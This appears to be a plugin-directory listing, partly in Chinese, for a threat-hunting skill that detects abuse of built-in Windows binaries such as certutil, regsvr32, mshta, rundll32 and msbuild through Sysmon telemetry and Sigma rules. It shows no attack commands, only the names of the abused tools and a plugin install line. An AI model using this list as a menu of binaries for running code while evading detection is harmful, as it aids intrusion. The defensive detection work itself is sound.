Stats
Actions
Tags
Detects LOLBin/LOLBAS abuse including certutil, regsvr32, mshta, rundll32 via Sysmon telemetry, Sigma rules, and parent-child process analysis for threat hunting.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity-skills-zh:detecting-living-off-the-land-with-lolbasThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
离地二进制文件、脚本和库(LOLBAS)是攻击者滥用的合法系统工具,用于在规避检测的同时执行恶意操作。本技能涵盖使用来自 Sysmon 和 Windows 事件日志的进程遥测,结合基于 Sigma 规则的检测,检测 certutil.exe、regsvr32.exe、mshta.exe、rundll32.exe、msbuild.exe 和其他 LOLBin 的滥用。
离地二进制文件、脚本和库(LOLBAS)是攻击者滥用的合法系统工具,用于在规避检测的同时执行恶意操作。本技能涵盖使用来自 Sysmon 和 Windows 事件日志的进程遥测,结合基于 Sigma 规则的检测,检测 certutil.exe、regsvr32.exe、mshta.exe、rundll32.exe、msbuild.exe 和其他 LOLBin 的滥用。
npx claudepluginhub killvxk/cybersecurity-skills-zhDetects LOLBAS abuse (certutil, regsvr32, mshta, rundll32) via Sysmon process telemetry, Sigma rules, and parent-child process analysis for threat hunting and SOC investigations.
Detects LOLBAS abuse (certutil, regsvr32, mshta, rundll32) via Sysmon process telemetry, Sigma rules, and parent-child process analysis for threat hunting and SOC investigations.
Detects LOLBins/LOLBAS abuse (certutil, regsvr32, mshta, rundll32) via Sysmon process telemetry, Sigma rules, and parent-child analysis for threat hunting and SOC investigations.